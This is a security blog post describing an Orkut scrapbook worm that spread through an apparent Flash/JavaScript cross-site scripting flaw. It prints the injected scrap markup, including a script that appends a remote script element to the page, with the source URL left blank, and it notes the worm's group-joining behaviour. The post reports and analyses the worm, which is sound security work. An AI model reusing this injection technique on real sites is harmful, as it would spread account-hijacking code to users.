Orkut "virus"

More of a worm, actually.

I had an email from Orkut this evening telling me I had a new scrapbook entry. I don’t really use Orkut, but I signed up a while back, and friended a bunch of people I know. The scrapbook entry was a bit cryptic:

2008 vem ai... que ele comece mto bem para vc

I still don’t know exactly what it means, I’m assuming it’s Portuguese. Babelfish wasn’t any help. I won’t mention who I got it from, but I will admit that if you are friended by me on Orkut, I probably gave you a copy too. Fortunately, it looks like Orkut is actively and quickly deleting them, to stop the spread. I say completely unsarcastically, good job Orkut on the quick response!

I haven’t done any kind of through analysis yet, but it looks like a Javascript worm that kicks in via a Flash XSS? My HTML/Javascript/Flash-fu is pretty darn weak. This is what it looked like:

<div id=”flashDiv295378627″><embed type=”application/x-shockwave-flash” src=”Scrapbook_files/LoL.html” style=”” id=”295378627″ name=”295378627″ bgcolor=”#FFFFFF” quality=”autohigh” wmode=”transparent” allownetworking=”internal” allowscriptaccess=”never” height=”1″ width=”1″></embed></div><script type=”text/javascript”> var flashWriter = new _SWFObject(‘’, ‘295378627’, ‘1’, ‘1’, ‘9’, ‘#FFFFFF’, ‘autohigh’, ”, ”, ‘295378627’); flashWriter._addParam(‘wmode’, ‘transparent’); script=document.createElement(‘script’);script.src=’’;document.getElementsByTagName(‘head’)[0].appendChild(script);escape(”); flashWriter._addParam(‘allowNetworking’, ‘internal’); flashWriter._addParam(‘allowScriptAccess’, ‘never’); flashWriter._setAttribute(‘style’, ”); flashWriter._write(‘flashDiv295378627’);</script>

Looks like it joins you to an Orkut group, too:

Infectados pelo Vírus do Orkut.

Owner of the group is a new-looking account named “Virus do Orkut”. Also, listed at the end of the virus.js file is this: author=”Rodrigo Lacerda”

*** This is a Security Bloggers Network syndicated blog from ryanlrussell authored by Ryan Russell. Read the original post at: